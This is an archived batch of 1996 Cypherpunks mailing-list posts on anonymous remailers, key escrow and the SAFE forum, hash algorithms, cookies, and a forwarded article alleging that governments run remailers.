Depends.  If you're paranoia is irrational, then you may do irrational things 
that will hurt...

For instance, there are people who believe that the NSA has control 
over every C compiler on the planet which inserts a back door into 
any version of PGP, and therefore the only 'safe' PGP is v1.0.

Rob.
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 2 Jul 1996 10:54:28 +0800
To: John Young <jya@pipeline.com>
Subject: Re: The Net and Terrorism
In-Reply-To: <199607012008.UAA08186@pipe6.t2.usa.pipeline.com>
Message-ID: <Pine.SUN.3.91.960701183304.1115A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


[www.nbc.gov]

hmmm... I remember using IRC during scud attacks when I was working at 
the Technion. Useful sources of info, but kind of worrying when you 
suddenly lose all of Tel Aviv when a server picks an importune time to 
reboot :-)

Simon
   I want my, I want my, I want my Atropine
---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 2 Jul 1996 07:59:40 +0800
To: cypherpunks@toad.com
Subject: Technology and Privacy
Message-ID: <199607011930.TAA03640@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, July 1, 1996, p. A16. 
 
 
   Technology and Privacy [Letter] 
 
 
   In reference to the May 31 editorial "Plant Lights and 
   Privacy" commenting on an 11th Circuit Court of Appeals 
   decision to uphold the use of thermal imaging in cases 
   involving indoor marijuana growing operations: The U.S. 
   Supreme Court had just declined to review that 11th Circuit 
   decision. 
 
   On June 11, The Post published a letter from Jack King 
   ["When Government Can Look Through Walls"] warning us that 
   thermal imaging, as developed by the military and as used 
   by civilian law enforcement agencies with the cooperation 
   of the military, posed an Orwellian threat to citizens 
   because the government could use the technology to tell if 
   two people were making love in the privacy of their 
   bedroom. 
 
   To set the record straight, military thermal imaging is 
   used to support civilian law enforcement only after other 
   probable cause for a search warrant, such as power bills, 
   observation of boarded-up windows, vents on the roof to 
   draw away heat and buys by confidential informants, are 
   documented. The military is then called in, using thermal 
   imagers, to determine if there is an unusual heat source in 
   the house as detected by heat escaping from the house. In 
   dozens of cases where thermal imaging was used, I have not 
   observed one case where it could detect the activity of 
   people in a house, let alone a bedroom. I also have not 
   observed the technology to have the ability to detect what 
   people are doing in any room behind closed doors, covered 
   windows and walls other than to detect blurs or shadows 
   moving around behind light curtains. 
 
   The United States v. Cusumano language quoted by Mr. King 
   was reversed last month by the court because the original 
   three judges decided it was an issue that didn't need 
   deciding, i.e. the constitutionality of thermal imaging 
   absent a search warrant, and did not exercise "judicial 
   restraint." 
 
   The trend to Mr. King's "militarization" of the war on 
   drugs, based on a decision by then-secretary of defense 
   Richard Cheney that drug use represented a threat to our 
   national security, is being carried out with restraint, 
   respect for the law and an appropriate appreciation for the 
   privacy of our citizens. 
 
   Barrie A. Vernon 
   Alexandria 
   The writer is an attorney with the National Guard Bureau at 
   the Pentagon working in support of the counter-drug 
   directorate. 
 
   [End] 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 2 Jul 1996 08:13:41 +0800
To: cypherpunks@toad.com
Subject: Re: The Net and Terrorism
Message-ID: <199607012008.UAA08186@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   To complement Tim May's essay on the Net and Terrorism: 
 
 
   The Washington Post, July 1, 1996, Business, p. 22. 
 
 
   Keeping the Military in High Tech [Excerpts] 
 
 
   At Camber Corporation in Springfield, Va., posters, comic 
   strips and colorful Silicon Graphics Inc. computers dot the 
   office landscape. Employees banter as they work. 
 
   Technical director Bryan Ware, 26, serves as the bridge  
   between the college-age computer programmers and the  
   military commanders who authorize the projects. "A lot of  
   military people don't know or trust technology," he said.  
   "A lot of computer nerds don't know or trust the military. 
   I know and like both." 
 
   The Army had a congressional mandate to prepare for 
   terrorists using chemical, biological or even nuclear 
   weapons and for civilian doctors having to figure out how 
   to treat the victims. To that end, the Army contracted 
   Camber to create the Nuclear Biological Chemical Medical 
   Defense Information Server which has many more bells and 
   whistles than the average Web site. 
 
   On the opening page, "danger" signs line the background. 
   Articles on the latest terrorist catastrophes appear in the 
   center of the screen. Black illuminated links to the site's 
   library, to news and to other information fill the 
   left-hand side. 
 
   Click on the library link, and medical manuals on nuclear, 
   biological and chemical warfare treatments appear. To the 
   left, a video section link becomes visible. Click on it, 
   and an interactive session begins between the user and an 
   actor playing the role of nuclear, chemical or biological 
   warfare victim. If the user administers the proper 
   treatment (it's good to read the library manuals before 
   going to the video), the victim will survive. If the user 
   fails to administer the correct procedures, the victim will 
   die. 
 
   "We try to have fun," said Alex Neifert, 21, who's working 
   on the Army Web site project for the summer before heading 
   back to the University of Michigan's Graduate School of 
   Information in the fall. 
 
   "We're hoping to improve the preparedness of the military 
   and civilian communities to deal with these types of 
   problems. This site will give doctors access to important 
   information that could save lives in the event of a 
   terrorist action," said the Army officer in charge of the 
   project. 
 
   Camber and the military hope that 1,000 visitors will view 
   the Web site daily when it officially opens July 3. To 
   access the site, point your browser to: www.nbc.gov/. 
 
   ----- 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bluebreeze@nym.jpunix.com (Blue Breeze)
Date: Tue, 2 Jul 1996 13:55:15 +0800
To: cypherpunks@toad.com
Subject: Sameer on C-SPAN
Message-ID: <199607020123.UAA19678@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


:From: Alex Strasheim <alex@crawfish.suba.com>
:Date: Mon, 1 Jul 1996 11:32:21 -0500 (CDT)
:
:Janlori Goldman, at the Center for Democracy & Technology, just mentioned
:Sameer's anonymizer on C-SPAN during a segment of Internet privacy.
:
:They showed a shot of the screen and everything.

Not everything. No picture of Sameer!? That's what I'd like to see.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Tue, 2 Jul 1996 16:00:33 +0800
To: cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
In-Reply-To: <adfab86806021004c248@[205.199.118.202]>
Message-ID: <4ra50l$is@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <adfab86806021004c248@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
> The newsgroup "alt.anonymous.messages" has existed for a year or two, and
> serves to be working reasonably well as a message pool. Check it out.

alt.anonymous.messages is not an ideal message pool-- it is a hack.
(Granted, it *is* a really cool, clever, and practically useful hack.)

Ian and I talked about this at some length.  alt.anonymous.messages
has certain unfortunate shortcomings.


Someone sniffing the Berkeley 'net can tell when I receive an
alt.anonymous.messages message by when I download an article from
the NNTP server; they can tell when I send such an article by when
I upload an article to the NNTP server; they can list all the
``subversive'' Berkeley folks who have read alt.anonymous.messages
lately.

The local NNTP server must be trusted.

Furthermore, even if you run a trusted NNTP server on your local
machine, there are still vulnerabilities.  Someone sniffing on your
subnet can tell when you inject a new message onto alt.anonymous.messages,
as can your neighboring NNTP servers.

Then there are all the standard message length and timing threats
from traffic analysis.  And there is no perfect forward secrecy
when using alpha nymservers to redirect email to alt.anonymous.messages.

There are also second-order threats, arising from the fact that
an attacker can selectively and remotely delete messages from some
spools by using cancel messages, without compromising any NNTP servers.


Ian's post detailed a proposal for implementing a message pool with
better security properties: link encryption, constant size messages,
randomized flooding, perfect forward secrecy, etc.

This mechanism is intended to provide recipient anonymity.  Sender
anonymity must still be achieved by standard chaining methods.


If folks have better ideas for how to achieve really good recipient
anonymity, I hope they'll speak up!

Take care,
-- Dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Tue, 2 Jul 1996 15:23:08 +0800
To: ogren@cris.com
Subject: Re: rsync and md4
Message-ID: <1.5.4.16.19960702023938.4637d0c4@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11.36 AM 7/1/96 -0400, David F. Ogren wrote:

>2.
>(quoted from Mr. Perry in an article entitled "MD5 breaks, etc.")
>
>>   checked. However, the result is widely known. MD5 is *not*
>>   something that should be trusted going forward, and I hope the next
>>   version of PGP uses SHA-1.
>
>As I understand the current plans, PGP 3.0 _will_ incorporate a SHA option. 
>In fact, I believe that there may already be "bootleg" versions that 
>incorporate SHA.

What is the difference between SHA and SHA-1? Is this algorithm subject
to the same licensing as MD5?

Could someone point me to such a bootleg version for DOS, please?

Thanks.

===============================================================================
David Rosoff (nihongo o sukoshi dekiru)  ---------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Non-technical beginner's guide to PGP ---> http://www.arc.unm.edu/~drosoff/pgp/
Anonymous ok, PGP ok.  If it's not PGP-signed, you know that I didn't write it.
=== === === === === === === === === === === === === === === === === === === ===
"Truth is stranger than fiction, especially when truth is being defined by the
O.J. Simpson Defense Team." -Dave Barry

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdiLyBguzHDTdpL5AQHACgP/dmJJ6aQ0ZVlHN3WcAsPkaGoAypU/iCz4
F8HSK6nxbmG+pBd5+82Flzqpquy23Wfp+uk2l+CIv7oygoOMXVvadRLTQKXZEe+h
8/rk0pLATszwLakwa427P5xgGs4mfwvKjzBi0LpEIu1qkUmWYGQphl7KPAumdLc+
+3Wpc0INmHY=
=qXUq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frogfarm@yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 2 Jul 1996 13:30:32 +0800
To: cypherpunks@toad.com
Subject: (fwd) Re: Cookie problem here , cookie problem there ...
Message-ID: <199607020059.UAA11206@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


[Given the recent upset here regarding cookies, of which I only have the
most cursory knowledge, I hope some will find this tidbit of use.]

>From: jerryw@convex.com (Jerry Whelan)
Newsgroups: comp.infosystems.www.authoring.cgi,comp.infosystems.www.authoring.misc,comp.infosystems.www.browsers.misc
Subject: Re: Cookie problem here , cookie problem there ...
Date: 1 Jul 1996 14:28:39 -0500
Lines: 28

In article <4r8m92$4u@news.istar.ca>,
Gord Jeoffroy <crs1583@inforamp.net> wrote:
-} Margaret <margaret@werple.net.au> wrote:
-} 
-} >You can disable the warnings, you cannot disable the cookies. I am 
-} >cancelling every cookie I encounter (I usually avoid sites heavy 
-} >with cookies), reason - I hate invasion of privacy and in particular, 
-} >junk email from direct marketing. 
-} 
-} 
-} I completely agree with your sentiment, by the way. I'm planning to
-} add an editorial to an online magazine I'm beginning. The article will
-} be full of server-side includes to demonstrate to the person reading
-} it that Big Brother definitely is watching.

I don't have any connection with these guys, except that I use
their software.  Check out www.privnet.com and the Internet Fast
Forward netscape plugin for Windows.  It can selectively filter
cookie transmissions to web servers as well as some other very
cool stuff like filter out unwanted images, including but not
limited to advertisements.  You will be amazed how much more
information you can get on your screen when you filter out the
useless images, like the one netscape puts at the top of their
home page.
-- 

------------------------------------------------------------------------------
Jerry Whelan -- Information Superman                         jerryw@convex.com

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
"We think people like seeing somebody in a uniform on the porch."  -US Postal
spokeswoman, quoted in AP 1/27/96. I don't know about you, but the only folks
I know who'd enjoy seeing someone in uniform on their porch are leathermen...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 2 Jul 1996 14:39:16 +0800
To: cypherpunks@toad.com
Subject: Iron Censorship
Message-ID: <2.2.32.19960702020835.00b36038@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


The New York Times reports that:

"Tipped off by an anonymous source named "nobody," Simon & Schuster Inc. and
its literary police are engaged in the Internet equivalent of a high-speed
car chase: tracking down a runaway book pirated on right-wing and anarchist
sites on the World Wide Web. 

In the last month, the publishing house's monitors have discovered more than
seven Internet sites containing the text of "Report from Iron Mountain,"
first published in 1967 and intended as political satire, and re-released
early this year by a Simon & Schuster imprint, the Free Press."
 
http://www.nytimes.com/library/cyber/week/0701iron-mountain.html

Taking up the challenge, I fired up AltaVista and quickly found:

http://www.cwi.nl/htbin/jack/mailfetch.py?2383

(2646 lines)

I haven't checked this version against my dog-eared first edition so I don't
know if this one has been modified by the Great Enemy.

DCF

"Who wonders what ever happened to the Regional Government Conspiracy.
Anyone out there remember "Blame Metro", "Terrible 1313" and other
chronicles of what used to be called the Metropolitan Government movement?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 2 Jul 1996 17:51:30 +0800
To: cypherpunks@toad.com
Subject: Info on alleged new German digital wiretapping law?
Message-ID: <Pine.GUL.3.94.960701221059.16581A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

None of the Europeans I ran into at today's SAFE conference had even heard
of the legislation decried at

 http://fight-censorship.dementia.org/fight-censorship/dl?num=3027

and in alt.fan.ernst-zundel. What's up?

- -rich
 http://www.stanford.edu/~llurch/
 send mail with subject line "send pgp key" for my key or "911" to page me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMdiyIpNcNyVVy0jxAQEi9QH7BglmZ3rtAnAcKp+5sMQzvWs8WUFXGzpO
N8jqMnhpWhkIyFyV62EvAMFKHMGSquaPb75aak8s2xFTXJGsAuZDRg==
=Dqj9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 2 Jul 1996 17:42:36 +0800
To: cypherpunks@toad.com
Subject: Re: Notes from SAFE meeting
In-Reply-To: <v02140b01adfe2083f1d8@[17.219.102.1]>
Message-ID: <Pine.GUL.3.94.960701225624.15058C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 1 Jul 1996, Martin Minow wrote:

> burns: fbi, cia, nsa presented to senate/congress: said nothing that wasn't
> already in public record (newspapers)

But he was entertaining.

> telia (Swedish Telecom) representative (Mattias Soederholm) -- can't import
> strong encryption as NSA claims it would harass company. doesn't like having
> to tell customers that USA will read their mail.

Specifically, he said "They said they had the power to harass us in ways
that could not be traced." Conspiracy hounds feel free to have a field day
with that one... 

> solve crimes, prevent crimes? would key escrow prevent oklahoma bombing?
> but without strong crypto, foreigner working outside usa can take plane down,
> grab medical records. etc., by hacking insecure networks.

This seems to be the best argument for the masses. Tod L... from Wired and
VTW felt the need to made some disparaging cracks about libertarian rants,
as he distinguished them from the rational commentary.

> second fundamental problem: operating key escrow center economically and
> technically difficult. 24/7/365, 2 hour response to law enforcement request.

Craig-somebody from Microsoft had earlier made an excellent point about the
insurability of zero-asset escrow agencies. Would you give your key to this
man?

(Yes, I did find that funny coming from a Microsoft employee.)

> the dumb criminal theory? blow up buildings with trucks they rent in
> their own names.

Of course, that kind of suicidally dumb criminal tends to do the most
damage. Key escrow wouldn't help because it's too slow.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 2 Jul 1996 17:55:46 +0800
To: cypherpunks@toad.com
Subject: SAFE Forum
Message-ID: <199607020623.XAA19680@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Rather than a complete report (which will cover a lot of material people
here already know), I will just give you my highlights from the forum.

None of the people on the first panel have been asked to testify before
either intelligence committee.  (Panel was: Lori Fena, EFF; Craig Mundie,
Microsoft; Eric Schmidt, Sun; and a substitute for Marc Andreessen from
Netscape).

Current government "Key Escrow" systems cost $200/key/year. [Craig Mundie] 
These systems can best be described as key-rental systems.

"Crime prevention ought to be part of the FBI's mission. [Herbert Lin,
National Research Council]

Jim Omura [Cylink] spoke of specific business his company has lost to
foreign competitors due to export licensing problems.  He spoke of
protecting US corporate links between China and the US.

CompuServe losses are mostly overseas (in e.g. the former USSR) due to
insecure communications and Telephone companies.  [Tom Oren, CompuServe]

PGP Inc bought ViaCrypt on Friday. [Phil Zimmermann, PGP Inc.]  (Scooped by
Ian Goldberg)

Congresswoman Eshoo appeared not to have heard about PGP being used by
human rights groups in e.g. Bosnia to protect their files.

National Research Council report available from: www2.nas.edu/cstbweb

A compromise on key length won't satisfy either side because those using
encryption to protect their data want every single message to be secure
(implying long keys and brute force times), while those monitoring
communications need to quickly decide whether a message is interesting
(implying short decrypt times).  [Whit Diffie, Sun]

We sell RC4, 40 bit decryption hardware (based on AMD29000) for $16K.  FPGA
devices for breaking DES in 7 days for $1M.  [Eric Thompson, Access Data]

NSA's problem is not crypto, but the explosive growth in the number of
protocols.  NSA needs to get out of the business of being a reputation
agent for crypto (thru ITAR approval) and allow weak crypto to naturally
appear in the market.  [Ken Bass, Venabel, Baetjer, Howard and Civiletti]

In the 1970s 50% of the wiretaps were of value, now only 17% are.  [Barry
Steinhardt, ACLU]

The introduction of "Dorothy" as the canonical Key Escrow (GAK) holder. 
(To great hoots of laughter.)  [I think this was Tom Parenty, Sybase, but I
could be wrong.]

When analyzing the crypto requirements of bad guys (e.g. terrorists) and
good guys (e.g. digital commerce users), the bad guys are small, tight knit
communities where the current, widely available, crypto systems work well. 
The good guys are not tight knit and need infrastructure we don't have,
such as widely available software and certification.  [Very broadly taken
from Whit Diffie]


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 2 Jul 1996 17:49:25 +0800
To: root@edmweb.com
Subject: Re: rsync and md4 [NON-CRYPTO ALGORITHM]
Message-ID: <199607020623.XAA19699@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 AM 6/30/96 +1000, Andrew Tridgell wrote:
>It effectively creates binary diffs of the two files, without direct
>(local) access to both files. As far as I know this is a new type of
>algorithm.

I worked with an algorithm which sounds similar to this one back about 20
years ago when creating a diff for VM/370 at Tymshare.  Here's a quick
description of the algorithm so you can see how much the hashing discussion
below applies to your problem.

(1) Chose a way to break the files into "units".  We chose line ends.
(2) Hash each unit in both files making two vectors of hashes.
(3) Identify which units exist once and only once in a file by:
(3a) Initialize a (large) vector of 2-bit entries to all zeros.
(3b) Use the hash of each unit to index the vector.  If the entry is 00
change it to 01.  If it is 01 change it to 10.  If it is 10 leave it alone.
(4) And the two 2-bit entry vectors together to get the units that exist
once and only once in both files.  These units are anchors of similarity
between the files.
(5) Find the hashes which represent these anchors of similarity in both
files and link them together.
(6) Link the neighbors of already linked units.
(7) The unlinked hashes represent differences between the two files.

Note that this algorithm finds units that have been moved.  I had to do
something intelligent with this information to allow for diff-like output.

To handle binary files you may need to change the definition of "unit".


We used a simple barber poll hash.  We went for a number of years before we
had a hash failure.  (I know, there was a bug in the code that handled hash
failures.)  A hash based on a CRC calculation would probably be better.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 2 Jul 1996 19:25:28 +0800
To: cypherpunks@toad.com
Subject: "gov runs anon remailers"
Message-ID: <199607020636.XAA12930@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


fallout from that old, lame Strassman & Marlow paper. a bit on
the new Puzzle Palace.


------- Forwarded Message
Date: Mon, 1 Jul 1996 06:11:41 -0400 (EDT)
From: "Donna J. Logan" <revcoal@pcnet.com>
To: snetnews@alterzone.com, liberty-and-justice@pobox.com, act@efn.org
Subject: CAQ: CIA Spying on EMAIL (fwd)


- - ->  SearchNet's   snetnews   Mailing List


- - ---------- Forwarded message ----------
Date: Sun, 30 Jun 1996 15:19:38 -0700 (PDT)
To: Recipients of pol-abuse <pol-abuse@igc.apc.org>
Subject: CAQ: CIA Spying on EMAIL

From: Bob Witanek <bwitanek@igc.apc.org>

Posted dadoner@chesco.com  Thu Jun 20 23:46:55 1996
From: Ronnie Dadone <dadoner@chesco.com>
Subject: CIA Spying on Re-mail?

http://www.worldmedia.com/caq/articles/remail.html
>                  ARE THE FEDS SNIFFING YOUR RE-MAIL?
> 
>                             by Joh Dillon
> 
>      THE RULES OF PRIVACY ARE CHANGING WITH ELECTRONIC
>      COMMICATIONS, THE EAGERNESS OF GOVERNMENT TO PRY INTO OUR
>      COMMINICATIONS, APPARENTLY, IS NOT.
> 
> Foreign and domestic intelligence agencies are actively monitoring
> worldwide Internet traffic and are allegedly running anonymous
> re-mailer" services designed to protect the privacy of electronic
> mail users.
> 
> The startling claim that government snoops may be surreptitiously
> operating computer privacy protection systems used by private
> citizens was made earlier this year at a Harvard University Law
> School Symposium on the Global Information Infrastructure. The
> source was not some crazed computer hacker paranoid about government
> eavesdropping. Rather, the information was presented by two defense
> experts, Former Assistant Secretary of Defense Paul Strassmann, now
> a professor at West Point and the National Defense University in
> Washington, D.C., along with William Marlow, a top official at
> Science Applications International Corp., a leading security
> contractor.
> 
> Anonymous re-mailer services are pretty much what the name implies.
> By stripping identifying source information from e-mail messages,
> they allow people to post electronic messages without traceable
> return address information.
> 
> But Strassmann and Marlow said that the anonymous re-mailers, if
> used properly and in tandem with encryption software pose an
> unprecedented national security threat from information terrorists.
> Intelligence services have set up their own re-mailers in order to
> collect data on potential spies, criminals, and terrorists, they
> said. *1
> 
> Following their Harvard talk, Strassmann and Marlow explicitly
> acknowledged that a number of anonymous re-mailers in the US are run
> by government agencies scanning traffic," said Viktor
> Mayer-Schoenberger, a lawyer from Austria who attended the
> conference. Marlow said that the [US] government runs at least a
> dozen re-mailers and that the most popular re-mailers in France and
> Germany are run by respective agencies in those countries."2
> 
> Mayer-Schoenberger was shocked by the defense experts' statement and
> tried to spread the news by sending an e-mail message to Hotwired,
> the online version of Wired magazine. Although the story did not
> make headlines, his note quickly became the e-mail message relayed
> 'round the world, triggering over 300 messages to Strassmann and
> Marlow. It was followed by the electronic version of spin control.
> 
> Strassmann quickly posted a denial. In an interview, he said the
> Austrian completely misunderstood what he and Marlow had said. That
> was false," Strassmann said of Mayer-Schoenberger's message. That
> was the person's interpretation of what we said. ... We did not
> specifically mention any government. What we said was that
> governments are so heavily involved in this [Internet issues] that
> it seems plausible that governments would use it in many ways." *3
> (Marlow did not return a call for comment.)
> 
> But Harvard Law School Professor Charles Nesson, who heard the
> original exchange at the Harvard conference, recalls the
> conversation as Mayer-Schoenberger described it. *4
> Mayer-Schoenberger also stands by his story. I remember the
> conversation perfectly well," he e-mailed from Vienna. They said a
> couple of additional things I'm sure they don't want people to
> remember. But the statement about the re-mailers is the one most
> people heard and I think is quite explosive news, isn't it?" *5
> 
> Marlow said that actually a fair percentage of re-mailers around the
> world are operated by intelligence services, Mayer-Schoenberger
> recalled in a subsequent interview. Someone asked him: `What about
> the US, is the same true here as well?' Marlow said: `you bet.'
> 
> The notes for the Harvard symposium, posted on the World Wide Web,
> also lend credence to Mayer-Schoenberger's account. The CIA already
> has anonymous re-mailers but to effectively control [the Internet]
> would require 7,000 to 10,000 around the world," the notes quote
> Marlow as saying. *6
> --------------------------------------------------------------------
> 
> @EASE WITH EAVESDROPPING
> 
> Prying into e-mail is probably as old as e-mail itself. The Internet
> is notoriously insecure; messages are kept on computers for months
> or years. If they aren't stored safely, they can be viewed by anyone
> who rummages through electronic archives by searching through the
> hard drive, by using sophisticated eavesdropping techniques, or by
> hacking in via modem from a remote location. Once e-mail is
> obtained, legally or not, it can be enormously valuable. Lawyers are
> increasingly using archived e-mail as evidence in civil litigation.
> And it was Oliver North's e-mail (which he thought was deleted) that
> showed the depths of the Reagan administration's involvement in the
> Iran-Contra affair.
> 
> Moreover, it's easier to tap e-mail messages than voice telephone
> traffic, according to the paper written by Strassmann and Marlow. As
> e-mail traffic takes over an ever-increasing share of personal
> communications, inspection of e-mail traffic can yield more
> comprehensive evidence than just about any wire-tapping efforts,
> they wrote. E-mail tapping is less expensive, more thorough and less
> forgiving than any other means for monitoring personal
> communications. 7
> --------------------------------------------------------------------
> 
> @ RISK
> 
> Two kinds of anonymous re-mailers have evolved to protect the
> privacy of users. The first, and the less secure, are two-way
> database re-mailers," which maintain a log linking anonymous
> identities to real user names. These services are more accurately
> called pseudonymous" re-mailers since they assign a new name and
> address to the sender (usually a series of numbers or characters)
> and are the most vulnerable to security breaches, since the logs can
> be subpoenaed or stolen. The most popular pseudonymous" re-mailer is
> a Finnish service at anon.penet.fi".
> 
> I believe that if you want protection against a governmental body,
> you would be foolish to use anon.penet.fi," said Jeffrey Schiller,
> manager of the Massachusetts Institute of Technology computer
> network and an expert on e-mail and network security. Last year, in
> fact, authorities raided anon.penet.fi to look for the identity of a
> Church of Scientology dissident who had posted secret church papers
> on the Internet using the supposedly private service. *8
> 
> The second kind of re-mailers are cypherpunk" services run by
> computer-savvy privacy advocates. Someone desiring anonymity detours
> the message through the re-mailer; a re-mailer program removes
> information identifying the return address, and sends it on its way.
> Schiller says that a cypherpunk re-mailer in its simplest form is a
> program run on incoming e-mail that looks for messages containing a
> request-re-mailing-to" header line. When the program sees such a
> line, it removes the information identifying the sender and remails"
> the message. *9 Some re-mailers replace the return address with
> something like nobody@nowhere.org."
> 
> Further protection can be obtained by using free, publicly available
> encryption programs such as Pretty Good Privacy and by chaining
> messages and re-mailers together. Sending the message from re-mailer
> to re-mailer using encryption at each hop builds up an onion skin
> arrangement of encrypted messages inside encrypted messages. Some
> re-mailers will vary the timing of the outgoing mail, sending the
> messages out in random sequence in order to thwart attempts to trace
> mail back by linking it to when it was sent.
> --------------------------------------------------------------------
> 
> @ISSUE: THE RIGHT TO PRIVACY
> 
> Linking encrypted messages together can be tricky and
> time-consuming. So who would bother? A. Michael Froomkin, an
> assistant professor of law at the University of Miami and an expert
> on Internet legal issues, says anonymity allows people to practice
> political free speech without fear of retribution. Whistleblowers
> can identify corporate or government abuse while reducing their risk
> of detection. People with health problems that are embarrassing or
> might threaten their ability to get insurance can seek advice
> without concern that their names would be blasted electronically
> around the world. *10 A battered woman can use re-mailers to
> communicate with friends without her spouse finding her.
> 
> The Amnesty International human rights group has used anonymous
> re-mailers to protect information supplied by political dissidents,
> said Wayne Madsen, a computer security expert and co-author of a new
> edition of The Puzzle Palace, a book on the National Security
> Agency. Amnesty International has people who use re-mailers because
> if an intelligence service in Turkey tracks down [political
> opponents] ... they take them out and shoot them," he said. I would
> rather err on the side of those people. I would rather give the
> benefit of the doubt to human rights." *11
> 
> Strassmann and Marlow, on the other hand, see the threat to national
> security as an overriding concern. Their paper, Risk-Free Access
> into the Global Information Infrastructure via Anonymous Re-mailers,
> presented at the Harvard conference, is a call to electronic arms.
> In it, they warn that re-mailers will be employed in financial fraud
> and used by information terrorists" to spread stolen government
> secrets or to disrupt telecommunication, finance and power
> generation systems. Internet anonymity has rewritten the rules of
> modern warfare by making retaliation impossible, since the identity
> of the assailant is unknown, they said. Since biblical times, crimes
> have been deterred by the prospects of punishment. For that, the
> criminal had to be apprehended. Yet information crimes have the
> unique characteristic that apprehension is impossible. ...
> Information crimes can be committed easily without leaving any
> telltale evidence such as fingerprints, traces of poison or
> bullets," they wrote. *12
> 
> As an example, they cite the Finnish re-mailer (anon.penet.fi),
> claiming that it is frequently used by the ex-KGB Russian criminal
> element. Asked for proof or further detail, Strassmann said: That
> [paper] is as far in the public domain as you're going to get." *13
> 
> At the Harvard symposium, the pair provided additional allegations
> that anonymous re-mailers are used to commit crimes. There was a
> crisis not too long ago with a large international bank. At the
> heart of the problem turned out to be anonymous re-mailers. There
> was a massive exchange around the world of the vulnerabilities of
> this bank's network," Marlow said. *14
> 
> But David Banisar, an analyst with the Washington, D.C.-based
> Electronic Privacy Information Center (EPIC) downplayed this kind of
> anecdote, saying that such allegations are always used by
> governments when they want to breach the privacy rights of citizens.
> I think this information warfare stuff seems to be a way for the
> military trying to find new reasons for existence and for various
> opportunistic companies looking for ways to cash in. I'm really
> skeptical about a lot of it. The problem is nine-tenths hype and
> eight-tenths bad security practices," he said. Already existing
> Internet security systems like encryption and firewalls could take
> care of the problem."
> 
> The public should not have to justify why it needs privacy, he said.
> Why do you need window blinds? Privacy is one of those fundamental
> human rights that ties into other human rights such as freedom of
> expression, the right to associate with who you want, the right to
> speak your mind as you feel like it. ... The question shouldn't be
> what do you have to fear, it should be `Why are they listening in?'
> With a democratic government with constitutional limits to
> democratic power, they have to make the argument they need to listen
> in, not the other way around." *15
> 
> Froomkin, from the University of Miami, also questioned Strassmann
> and Mayer's conclusions. First of all, the statistics about where
> the re-mailers are and who runs them are inaccurate. I can't find
> anybody to confirm them," he said. I completely disagree with their
> assessment of facts and the conclusions they draw from them. ...
